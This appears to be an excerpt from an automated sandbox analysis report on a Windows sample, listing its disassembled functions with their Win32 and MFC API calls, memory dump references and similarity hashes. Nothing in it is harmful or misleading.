                                                              • Associated: 00000000.00000002.2078132660.000000000064B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2078157490.0000000000676000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2078173152.0000000000677000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_4d0000_BXOZIGZEUa.jbxd
                                                              Similarity
                                                              • API ID: ByteCharLocaleMultiWide$UpdateUpdate::___isleadbyte_l
                                                              • String ID:
                                                              • API String ID: 3058430110-0
                                                              • Opcode ID: c2185d15af73a2c10e60b87f0af3eb59359719d0511cbf4a575bc21fb2c23e48
                                                              • Instruction ID: ea2353ad6675b572695ea798c633d1055d9e8e612d4606017da742bbcb7872a9
                                                              • Opcode Fuzzy Hash: c2185d15af73a2c10e60b87f0af3eb59359719d0511cbf4a575bc21fb2c23e48
                                                              • Instruction Fuzzy Hash: 0D31A031A04286EFDB18DF66D8849BE3FA5FF01310F15A569E4918B1D2D3B0D980DB90
                                                              APIs
                                                              • SetWindowPos.USER32(?,00000000,?,?,?,?,00000014), ref: 0053684F
                                                              • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000000,00000014), ref: 00536885
                                                              • InvalidateRect.USER32(?,00000000,00000001), ref: 0053688F
                                                              • UpdateWindow.USER32(?), ref: 00536896
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2077935096.00000000004D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004D0000, based on PE: true
                                                              • Associated: 00000000.00000002.2077902542.00000000004D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2078044849.00000000005F8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2078091900.000000000063D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2078091900.0000000000645000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2078132660.000000000064B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2078157490.0000000000676000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2078173152.0000000000677000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_4d0000_BXOZIGZEUa.jbxd
                                                              Similarity
                                                              • API ID: Window$InvalidateRectUpdate
                                                              • String ID:
                                                              • API String ID: 1651931182-0
                                                              • Opcode ID: 43794ce68b328dae4f43450b899058d442fba71e0a5a9f21258be5f4388aee8e
                                                              • Instruction ID: 1259d3fc88f22bf8c6173a66edce854040223fc357d16257a9618a2996567d32
                                                              • Opcode Fuzzy Hash: 43794ce68b328dae4f43450b899058d442fba71e0a5a9f21258be5f4388aee8e
                                                              • Instruction Fuzzy Hash: A7315A31940B04FFCF32CF65C8889AABFF4FB98755F24892EE5A692111E7709980DB51
                                                              APIs
                                                              • __EH_prolog3_GS.LIBCMT ref: 005187AD
                                                              • GetDlgCtrlID.USER32(?), ref: 00518816
                                                                • Part of subcall function 004DACFF: __CxxThrowException@8.LIBCMT ref: 004DAD15
                                                                • Part of subcall function 004DACFF: __EH_prolog3.LIBCMT ref: 004DAD22
                                                              • WideCharToMultiByte.KERNEL32(00000003,00000000,?,000000FF,?,00000050,00000000,00000000,00000000,0000020C,0051B1BA,?,?,?), ref: 00518877
                                                              • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000000,00000213), ref: 005188AC
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2077935096.00000000004D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004D0000, based on PE: true
                                                              • Associated: 00000000.00000002.2077902542.00000000004D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2078044849.00000000005F8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2078091900.000000000063D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2078091900.0000000000645000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2078132660.000000000064B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2078157490.0000000000676000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2078173152.0000000000677000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_4d0000_BXOZIGZEUa.jbxd
                                                              Similarity
                                                              • API ID: ByteCharCtrlException@8H_prolog3H_prolog3_MultiThrowWideWindow
                                                              • String ID:
                                                              • API String ID: 1933732581-0
                                                              • Opcode ID: e139e5cc7d54ac1b17d3a0c8e4eb0e3adc032bd3e8fd9ac8181cf90154626e8f
                                                              • Instruction ID: fa3407e5851ba47715742854b1063459c8f0e8b4a408ebe65f6440fb9378b0bb
                                                              • Opcode Fuzzy Hash: e139e5cc7d54ac1b17d3a0c8e4eb0e3adc032bd3e8fd9ac8181cf90154626e8f
                                                              • Instruction Fuzzy Hash: B931E431540205ABDB30AB748C59FFE7B69BF60714F140A5EF526A62D1DE309DC0CA21
                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2077935096.00000000004D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004D0000, based on PE: true
                                                              • Associated: 00000000.00000002.2077902542.00000000004D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2078044849.00000000005F8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2078091900.000000000063D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2078091900.0000000000645000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2078132660.000000000064B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2078157490.0000000000676000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2078173152.0000000000677000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_4d0000_BXOZIGZEUa.jbxd
                                                              Similarity
                                                              • API ID: Rect$ClientEmptyWindow
                                                              • String ID:
                                                              • API String ID: 742297903-0
                                                              • Opcode ID: c701a0355a52873f49344f33b826a15ab61c6e7b1ba9f40d8d1ac38def82912e
                                                              • Instruction ID: 6e7c0eefc6b2b1757df68d5c13fbfadb0d8b683d2863facee90b22f8dd5e8722
                                                              • Opcode Fuzzy Hash: c701a0355a52873f49344f33b826a15ab61c6e7b1ba9f40d8d1ac38def82912e
                                                              • Instruction Fuzzy Hash: 51311AB1A00219EFDB04DF69D984A79BBF5FF4A304B108569E41ADB291EB34ED40CB90
                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2077935096.00000000004D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004D0000, based on PE: true
                                                              • Associated: 00000000.00000002.2077902542.00000000004D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2078044849.00000000005F8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2078091900.000000000063D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2078091900.0000000000645000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2078132660.000000000064B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2078157490.0000000000676000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2078173152.0000000000677000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_4d0000_BXOZIGZEUa.jbxd
                                                              Similarity
                                                              • API ID: EmptyRect
                                                              • String ID:
                                                              • API String ID: 2270935405-0
                                                              • Opcode ID: 389b45573f61d356f763cc80cdf4749ea212f25e1ee5fd3b1e56928ab0de723e
                                                              • Instruction ID: 36e7618f1634bccad4aa362f79bdcef232464054d46a7ccd28030102f0061f53
                                                              • Opcode Fuzzy Hash: 389b45573f61d356f763cc80cdf4749ea212f25e1ee5fd3b1e56928ab0de723e
                                                              • Instruction Fuzzy Hash: CC316D71900618DBCF11EFA5C8C09AEBBB8FF88710B60456AED05FB106EB759985CF91
                                                              APIs
                                                              • __EH_prolog3.LIBCMT ref: 005A64C3
                                                              • GetMenuItemCount.USER32(?), ref: 005A6515
                                                              • GetMenuItemID.USER32(?,00000000), ref: 005A6576
                                                              • GetSubMenu.USER32(?,00000000), ref: 005A6585
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2077935096.00000000004D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004D0000, based on PE: true
                                                              • Associated: 00000000.00000002.2077902542.00000000004D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2078044849.00000000005F8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2078091900.000000000063D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2078091900.0000000000645000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2078132660.000000000064B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2078157490.0000000000676000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2078173152.0000000000677000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_4d0000_BXOZIGZEUa.jbxd
                                                              Similarity
                                                              • API ID: Menu$Item$CountH_prolog3
                                                              • String ID:
                                                              • API String ID: 366217265-0
                                                              • Opcode ID: 9463321c11a19b4f984f41c3fdad819da57f9462fdf2c98e2319c8fd22ff6f1e
                                                              • Instruction ID: 65c099a9b766458e0f5776c1ca10277138c42cc92797a275fd40455a233afd69
                                                              • Opcode Fuzzy Hash: 9463321c11a19b4f984f41c3fdad819da57f9462fdf2c98e2319c8fd22ff6f1e
                                                              • Instruction Fuzzy Hash: AB31FCB0600903AFCF28EF64C8E9A7E7FA4FF5A305B18462EE112CA191CB30E841C650
                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2077935096.00000000004D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004D0000, based on PE: true
                                                              • Associated: 00000000.00000002.2077902542.00000000004D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2078044849.00000000005F8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2078091900.000000000063D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2078091900.0000000000645000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2078132660.000000000064B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2078157490.0000000000676000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2078173152.0000000000677000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_4d0000_BXOZIGZEUa.jbxd
                                                              Similarity
                                                              • API ID: EmptyRect$MetricsSystem
                                                              • String ID:
                                                              • API String ID: 4159773870-0
                                                              • Opcode ID: 3de4a6e4b161ddf925f5df2540c2876ea90890af9f39e167389d773311a6439f
                                                              • Instruction ID: 962bebe9b18252e625bdf6e4cdc1b56e91af0fe5af57dd8cb9c63f865de8d8c4
                                                              • Opcode Fuzzy Hash: 3de4a6e4b161ddf925f5df2540c2876ea90890af9f39e167389d773311a6439f
                                                              • Instruction Fuzzy Hash: 4D31387190061ADFCF04DFA4C88CAEA7BB4FF49304F0805B9ED09AF145DA75A945CBA0
                                                              APIs
                                                              • GetWindowRect.USER32(?,?), ref: 0054CF52
                                                              • GetParent.USER32(?), ref: 0054CF5B
                                                                • Part of subcall function 004E011B: ScreenToClient.USER32(?,?), ref: 004E012C
                                                                • Part of subcall function 004E011B: ScreenToClient.USER32(?,?), ref: 004E0139
                                                              • OffsetRect.USER32(?,00000000,?), ref: 0054CF9C
                                                              • OffsetRect.USER32(?,?,00000000), ref: 0054CFAE
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2077935096.00000000004D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004D0000, based on PE: true
                                                              • Associated: 00000000.00000002.2077902542.00000000004D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2078044849.00000000005F8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2078091900.000000000063D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2078091900.0000000000645000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2078132660.000000000064B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2078157490.0000000000676000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2078173152.0000000000677000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_4d0000_BXOZIGZEUa.jbxd
                                                              Similarity
                                                              • API ID: Rect$ClientOffsetScreen$ParentWindow
                                                              • String ID:
                                                              • API String ID: 182828750-0
                                                              • Opcode ID: 5c2a2746acdb61531143b67f5bb878cb0e199b09933d58d68308bcb830f40130
                                                              • Instruction ID: db807074f18df92656804f2717075c0ac6d6ff17cfd4e0b2cc0f491f901b6d70
                                                              • Opcode Fuzzy Hash: 5c2a2746acdb61531143b67f5bb878cb0e199b09933d58d68308bcb830f40130
                                                              • Instruction Fuzzy Hash: 772121B1901209AFDB14DFA5DC89EBFBFB9FF98304B10451AF406E7250DA389944CB61
                                                              APIs
                                                                • Part of subcall function 004ECBFE: GetWindowLongW.USER32(?,000000F0), ref: 004ECC09
                                                              • GetForegroundWindow.USER32 ref: 0055F57C
                                                              • GetLastActivePopup.USER32(?), ref: 0055F5A0
                                                              • SendMessageW.USER32(?,0000036D,00000040,00000000), ref: 0055F5B8
                                                              • SendMessageW.USER32(?,0000036D,00000000,00000000), ref: 0055F5DD
                                                                • Part of subcall function 004DACFF: __CxxThrowException@8.LIBCMT ref: 004DAD15
                                                                • Part of subcall function 004DACFF: __EH_prolog3.LIBCMT ref: 004DAD22
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2077935096.00000000004D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004D0000, based on PE: true
                                                              • Associated: 00000000.00000002.2077902542.00000000004D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2078044849.00000000005F8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2078091900.000000000063D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2078091900.0000000000645000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2078132660.000000000064B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2078157490.0000000000676000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2078173152.0000000000677000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_4d0000_BXOZIGZEUa.jbxd
                                                              Similarity
                                                              • API ID: MessageSendWindow$ActiveException@8ForegroundH_prolog3LastLongPopupThrow
                                                              • String ID:
                                                              • API String ID: 2019557511-0
                                                              • Opcode ID: e8e131230ee9e81b6ec8b6471bf092d7179449ee88bd5c789e2133637a299544
                                                              • Instruction ID: 4820ca3ab54534f10b57f053521c4b611e4658097cc69a5d920b32aa470b6619
                                                              • Opcode Fuzzy Hash: e8e131230ee9e81b6ec8b6471bf092d7179449ee88bd5c789e2133637a299544
                                                              • Instruction Fuzzy Hash: E511C1B2B10241ABDB10AFA69C55F6E3A69EB4870AF00007BBA02D6150FA38DD04C765
                                                              APIs
                                                              • __EH_prolog3.LIBCMT ref: 004DA504
                                                                • Part of subcall function 004D8E6A: _malloc.LIBCMT ref: 004D8E88
                                                              • __CxxThrowException@8.LIBCMT ref: 004DA549
                                                              • FormatMessageW.KERNEL32(00001100,00000000,?,00000800,004DAFE2,00000000,00000000,?,004DAFE2,0062BC4C,00000004,004D8C28,004DAFE2,?,004DAFE2), ref: 004DA573
                                                              • LocalFree.KERNEL32(004DAFE2,004D8C28,004DAFE2,?,004DAFE2), ref: 004DA5A1
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2077935096.00000000004D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004D0000, based on PE: true
                                                              • Associated: 00000000.00000002.2077902542.00000000004D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2078044849.00000000005F8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2078091900.000000000063D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2078091900.0000000000645000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2078132660.000000000064B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2078157490.0000000000676000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2078173152.0000000000677000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_4d0000_BXOZIGZEUa.jbxd
                                                              Similarity
                                                              • API ID: Exception@8FormatFreeH_prolog3LocalMessageThrow_malloc
                                                              • String ID:
                                                              • API String ID: 1776251131-0
                                                              • Opcode ID: b416bdbfdd1a920a7685aa338598a79f710c77ec37c228997559ccfb53967518
                                                              • Instruction ID: d0fd1c8880a1ec843140760ba7772a798d99ce93b9432f6365df45fc0e90a648
                                                              • Opcode Fuzzy Hash: b416bdbfdd1a920a7685aa338598a79f710c77ec37c228997559ccfb53967518
                                                              • Instruction Fuzzy Hash: E511D071900209FFDB019F64DC15BBE3BB6FF84714F20891AF9258A2A0DB749A118B95
                                                              APIs
                                                              • GetParent.USER32(?), ref: 004EF761
                                                              • SendMessageW.USER32(?,0000000B,00000001,00000000), ref: 004EF7A4
                                                              • RedrawWindow.USER32(?,00000000,00000000,00000185), ref: 004EF7B0
                                                              • SendMessageW.USER32(?,0000000B,00000000,00000000), ref: 004EF78F
                                                                • Part of subcall function 0051BCC8: SendMessageW.USER32(?,00000234,00000000,00000000), ref: 0051BD43
                                                                • Part of subcall function 0051BCC8: SendMessageW.USER32(?,00000229,00000000,00000000), ref: 0051BD6A
                                                                • Part of subcall function 0051BCC8: SendMessageW.USER32(?,00000229,00000000,00000000), ref: 0051BD87
                                                                • Part of subcall function 0051BCC8: SendMessageW.USER32(?,00000222,?,00000000), ref: 0051BD9E
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2077935096.00000000004D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004D0000, based on PE: true
                                                              • Associated: 00000000.00000002.2077902542.00000000004D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2078044849.00000000005F8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2078091900.000000000063D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2078091900.0000000000645000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2078132660.000000000064B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2078157490.0000000000676000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2078173152.0000000000677000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_4d0000_BXOZIGZEUa.jbxd
                                                              Similarity
                                                              • API ID: MessageSend$ParentRedrawWindow
                                                              • String ID:
                                                              • API String ID: 2139789815-0
                                                              • Opcode ID: 1cbd641d30e8187d0fbc1ee3582c2cde4bb39150fcd9fa21e890d88841300750
                                                              • Instruction ID: 7715b137d70c2ebff926a573409d67f43d3cd3b4f92f010ca787f14cbcedd901
                                                              • Opcode Fuzzy Hash: 1cbd641d30e8187d0fbc1ee3582c2cde4bb39150fcd9fa21e890d88841300750
                                                              • Instruction Fuzzy Hash: E011E072200288BFEB206F62CCC9E7B7AAAFB84355F10043AF10496250DB799D45DB90
                                                              APIs
                                                              • FindResourceW.KERNEL32(?,00000000,00000005), ref: 0053F1B4
                                                              • LoadResource.KERNEL32(?,00000000), ref: 0053F1BC
                                                              • LockResource.KERNEL32(00000000), ref: 0053F1CE
                                                              • FreeResource.KERNEL32(00000000), ref: 0053F21C
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2077935096.00000000004D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004D0000, based on PE: true
                                                              • Associated: 00000000.00000002.2077902542.00000000004D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2078044849.00000000005F8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2078091900.000000000063D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2078091900.0000000000645000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2078132660.000000000064B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2078157490.0000000000676000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2078173152.0000000000677000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_4d0000_BXOZIGZEUa.jbxd
                                                              Similarity
                                                              • API ID: Resource$FindFreeLoadLock
                                                              • String ID:
                                                              • API String ID: 1078018258-0
                                                              • Opcode ID: e7c42f0989a7431d9859247346631ef46da0cda733ade0943876c46ffba67c68
                                                              • Instruction ID: 93685be692cb3f807891aaadf926f838670384af0722f232bfc5b65ed4225d0f
                                                              • Opcode Fuzzy Hash: e7c42f0989a7431d9859247346631ef46da0cda733ade0943876c46ffba67c68
                                                              • Instruction Fuzzy Hash: FA118F39940611EBDB209FA5EC48A7BBBB8FF04359F108139F85293650E774ED44E7A0
                                                              APIs
                                                                • Part of subcall function 004ECB9E: GetDlgItem.USER32(?,?), ref: 004ECBAF
                                                              • GetWindowLongW.USER32(?,000000F0), ref: 00515614
                                                              • GetWindowTextLengthW.USER32(?), ref: 00515641
                                                              • GetWindowTextW.USER32(?,00000000,00000100), ref: 00515670
                                                              • SendMessageW.USER32(?,0000014D,000000FF,?), ref: 00515691
                                                                • Part of subcall function 004E0D9F: lstrlenW.KERNEL32(?,?,?), ref: 004E0DCB
                                                                • Part of subcall function 004E0D9F: _memset.LIBCMT ref: 004E0DE9
                                                                • Part of subcall function 004E0D9F: GetWindowTextW.USER32(00000000,?,00000100), ref: 004E0E03
                                                                • Part of subcall function 004E0D9F: lstrcmpW.KERNEL32(?,?,?,?), ref: 004E0E15
                                                                • Part of subcall function 004E0D9F: SetWindowTextW.USER32(00000000,?), ref: 004E0E21
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2077935096.00000000004D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004D0000, based on PE: true
                                                              • Associated: 00000000.00000002.2077902542.00000000004D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2078044849.00000000005F8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2078091900.000000000063D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2078091900.0000000000645000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2078132660.000000000064B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2078157490.0000000000676000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2078173152.0000000000677000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_4d0000_BXOZIGZEUa.jbxd
                                                              Similarity
                                                              • API ID: Window$Text$ItemLengthLongMessageSend_memsetlstrcmplstrlen
                                                              • String ID:
                                                              • API String ID: 205973220-0
                                                              • Opcode ID: 1712046138b1e063fa01b76d4ad14bd7977fd38538b76e09c0a2adff4fb52e20
                                                              • Instruction ID: 2e43b69d2cbbdfd7f653ba83732c26bf7f8d80c91d4da2bbe0cc2173b49cc6d9
                                                              • Opcode Fuzzy Hash: 1712046138b1e063fa01b76d4ad14bd7977fd38538b76e09c0a2adff4fb52e20
                                                              • Instruction Fuzzy Hash: 63117C32100609EBEF01AF64CC05EF97F65FF84360F64461AF9698A1E0DB35A890EB84
                                                              APIs
                                                              • RegSetValueExW.ADVAPI32(00000000,?,00000000,00000004,?,00000004), ref: 004E4363
                                                              • RegCloseKey.ADVAPI32(00000000), ref: 004E436C
                                                              • swprintf.LIBCMT ref: 004E4389
                                                              • WritePrivateProfileStringW.KERNEL32(?,?,?,?), ref: 004E439A
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2077935096.00000000004D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004D0000, based on PE: true
                                                              • Associated: 00000000.00000002.2077902542.00000000004D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2078044849.00000000005F8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2078091900.000000000063D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2078091900.0000000000645000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2078132660.000000000064B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2078157490.0000000000676000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2078173152.0000000000677000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_4d0000_BXOZIGZEUa.jbxd
                                                              Similarity
                                                              • API ID: ClosePrivateProfileStringValueWriteswprintf
                                                              • String ID:
                                                              • API String ID: 22681860-0
                                                              • Opcode ID: a1bbd12442c3d078deff7648d443a32a6813970a2e23cb4d56a5aa9b1627b5ff
                                                              • Instruction ID: 43056a8c96ce38c12fbf2075d281cd35c2e4e95ba5161d27a38e69dc582f2a2c
                                                              • Opcode Fuzzy Hash: a1bbd12442c3d078deff7648d443a32a6813970a2e23cb4d56a5aa9b1627b5ff
                                                              • Instruction Fuzzy Hash: A0018E72600209BBDB109F658C4AFBB77ACAB88714F10041ABA01E7180DA78F9059769
                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2077935096.00000000004D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004D0000, based on PE: true
                                                              • Associated: 00000000.00000002.2077902542.00000000004D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2078044849.00000000005F8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2078091900.000000000063D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2078091900.0000000000645000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2078132660.000000000064B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2078157490.0000000000676000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2078173152.0000000000677000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_4d0000_BXOZIGZEUa.jbxd
                                                              Similarity
                                                              • API ID: RectWindow$CursorFromPoint
                                                              • String ID:
                                                              • API String ID: 3445796726-0
                                                              • Opcode ID: bf52f65e0d9812e3decea95f59925c424b70afff57f1f3d7387e84a0eb960963
                                                              • Instruction ID: 2d40f61d2519a0671d1db22778a64a1130b41cdde4a87c43af34e8306bb6e4c1
                                                              • Opcode Fuzzy Hash: bf52f65e0d9812e3decea95f59925c424b70afff57f1f3d7387e84a0eb960963
                                                              • Instruction Fuzzy Hash: D711F8B1E0020AAFCF11AFA598859BFBBF9FF98304B20486AE505E2150DB759905DB61
                                                              APIs
                                                              • GetCursorPos.USER32(00000000), ref: 0054CD16
                                                                • Part of subcall function 0054C83F: GetWindowRect.USER32(?,?), ref: 0054C855
                                                                • Part of subcall function 0054C83F: GetParent.USER32(?), ref: 0054C897
                                                                • Part of subcall function 0054C83F: GetParent.USER32(?), ref: 0054C8A7
